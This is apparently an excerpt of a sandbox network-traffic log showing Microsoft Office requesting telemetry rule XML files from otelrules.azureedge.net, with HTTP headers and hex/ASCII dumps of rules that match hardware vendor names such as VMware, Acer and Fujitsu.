            2024-11-21 08:50:21 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            20192.168.2.44977213.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:20 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:21 UTC491INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:21 GMT
            Content-Type: text/xml
            Content-Length: 427
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
            ETag: "0x8DC582BA310DA18"
            x-ms-request-id: 3e1ce11e-901e-00ac-5292-3bb69e000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085021Z-r1d97b99577ckpmjhC1TEBrzs00000000a3g00000000b3f6
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            X-Cache-Info: L1_T2
            Accept-Ranges: bytes
            2024-11-21 08:50:21 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


            Session IDSource IPSource PortDestination IPDestination Port
            21192.168.2.44977313.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:20 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:21 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:21 GMT
            Content-Type: text/xml
            Content-Length: 486
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
            ETag: "0x8DC582B9018290B"
            x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085021Z-178bfbc474bmqmgjhC1NYCy16c00000001dg000000000bhk
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:21 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            22192.168.2.44977413.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:22 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:23 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:23 GMT
            Content-Type: text/xml
            Content-Length: 407
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
            ETag: "0x8DC582B9698189B"
            x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085023Z-178bfbc474bnwsh4hC1NYC2ubs000000019000000000896b
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:23 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


            Session IDSource IPSource PortDestination IPDestination Port
            23192.168.2.44977713.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:23 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:23 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:23 GMT
            Content-Type: text/xml
            Content-Length: 477
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
            ETag: "0x8DC582BB8CEAC16"
            x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085023Z-1777c6cb754lvj6mhC1TEBke940000000az0000000004d7e
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            24192.168.2.44977813.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:23 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:23 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:23 GMT
            Content-Type: text/xml
            Content-Length: 464
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
            ETag: "0x8DC582B97FB6C3C"
            x-ms-request-id: 8189730a-201e-0003-216a-3bf85a000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085023Z-178bfbc474bv7whqhC1NYC1fg400000001a0000000002kdv
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:23 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


            Session IDSource IPSource PortDestination IPDestination Port
            25192.168.2.44977513.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:23 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:23 UTC491INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:23 GMT
            Content-Type: text/xml
            Content-Length: 469
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
            ETag: "0x8DC582BBA701121"
            x-ms-request-id: 835fb09e-e01e-0003-07ce-3b0fa8000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085023Z-r1d97b99577xdmfxhC1TEBqbhg00000001v0000000002uc7
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            X-Cache-Info: L1_T2
            Accept-Ranges: bytes
            2024-11-21 08:50:23 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            26192.168.2.44977613.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:23 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:23 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:23 GMT
            Content-Type: text/xml
            Content-Length: 415
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
            ETag: "0x8DC582BA41997E3"
            x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085023Z-1777c6cb754dqb2khC1TEBmk1s0000000aqg00000000knv8
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


            Session IDSource IPSource PortDestination IPDestination Port
            27192.168.2.44978013.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:25 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:26 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:26 GMT
            Content-Type: text/xml
            Content-Length: 494
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
            ETag: "0x8DC582BB7010D66"
            x-ms-request-id: e7bb18f6-501e-000a-54a9-3b0180000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085025Z-1777c6cb754rz2pghC1TEBghen0000000au000000000456t
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:26 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            28192.168.2.44978113.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:25 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:25 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:25 GMT
            Content-Type: text/xml
            Content-Length: 419
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
            ETag: "0x8DC582B9748630E"
            x-ms-request-id: 0f1ce2f4-701e-0001-5e8c-3ab110000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085025Z-r1d97b99577lxltfhC1TEByw2s0000000a700000000044pw
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


            Session IDSource IPSource PortDestination IPDestination Port
            29192.168.2.44978213.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:25 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:25 UTC491INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:25 GMT
            Content-Type: text/xml
            Content-Length: 472
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
            ETag: "0x8DC582B9DACDF62"
            x-ms-request-id: 107b228c-c01e-00a2-1f8c-3a2327000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085025Z-178bfbc474btrnf9hC1NYCb80g00000001fg000000000t2k
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            X-Cache-Info: L1_T2
            Accept-Ranges: bytes
            2024-11-21 08:50:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            30192.168.2.44978313.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:25 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:25 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:25 GMT
            Content-Type: text/xml
            Content-Length: 404
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
            ETag: "0x8DC582B9E8EE0F3"
            x-ms-request-id: 4ec414f5-001e-0046-5fa0-3bda4b000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085025Z-r1d97b99577d6qrbhC1TEBux5s0000000a5g00000000d6gz
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:25 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


            Session IDSource IPSource PortDestination IPDestination Port
            31192.168.2.44978413.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:25 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:25 UTC470INHTTP/1.1 200 OK
